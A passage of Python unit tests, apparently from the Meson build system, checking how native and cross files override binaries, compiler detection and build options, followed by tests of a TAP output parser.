env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write(f"bash = '{wrapper}'\n")
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, f'-Dcase={case}'])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', f'python{v}'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang: str, binary: str, version_str: str, version: str) -> None:
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, f'detect_{lang}_compiler')
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = [wrapper]
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = [wrapper]
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overridden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '40 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0),
('CaseSenSiTivE', 'SOME other Value'),
('CASESENSITIVE', 'some other Value')]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '40 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '40 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find werror in build options?')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/foo'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '98 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all three sections')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '223 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises((RuntimeError, subprocess.CalledProcessError)) as cm:
self.init(testcase, extra_args=['--native-file', config])
if isinstance(cm, RuntimeError):
check = str(cm.exception)
else:
check = cm.exception.stdout
self.assertIn(check, 'Parent should override default_library')
def test_builtin_options_subprojects_dont_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '223 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
self.init(testcase, extra_args=['--native-file', config])
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
return textwrap.dedent(f"""\
[binaries]
c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
ar = '{shutil.which('ar')}'
strip = '{shutil.which('strip')}'
exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'}
[properties]
needs_exe_wrapper = {needs_exe_wrapper}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""")
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '71 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, f'generated{self.current_config}.config')
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write(f'[{section}]\n')
for k, v in entries.items():
f.write(f"{k}={v!r}\n")
return filename
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overridden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a touch test for cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '40 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked pkg-config path, but any would
do that can be set for both.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native', 'cpp_args': '-DFILE'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross', 'cpp_args': '-DFILE'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir',
'CXXFLAGS': '-DENV', 'CXXFLAGS_FOR_BUILD': '-DENV'})
configuration = self.introspect('--buildoptions')
found = 0
expected = 4
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native'])
found += 1
elif each['name'].endswith('cpp_args'):
self.assertEqual(each['value'], ['-DFILE'])
found += 1
if found == expected:
break
self.assertEqual(found, expected, 'Did not find all sections.')
def test_for_build_env_vars(self) -> None:
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {}})
cross = self.helper_create_cross_file({'built-in options': {}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/dir'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
def test_project_options_native_only(self) -> None:
# Do not load project options from a native file when doing a cross
# build
testcase = os.path.join(self.unit_test_dir, '19 array option')
config = self.helper_create_cross_file({'project options': {'list': ['bar', 'foo']}})
cross = self.helper_create_cross_file({'binaries': {}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'list':
self.assertEqual(each['value'], ['foo', 'bar'])
break
else:
self.fail('Did not find expected option.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser()
return iter(parser.parse(io.StringIO(s)))
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, num_tests=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, num_tests=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, num_tests=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, num_tests=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, num_tests=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
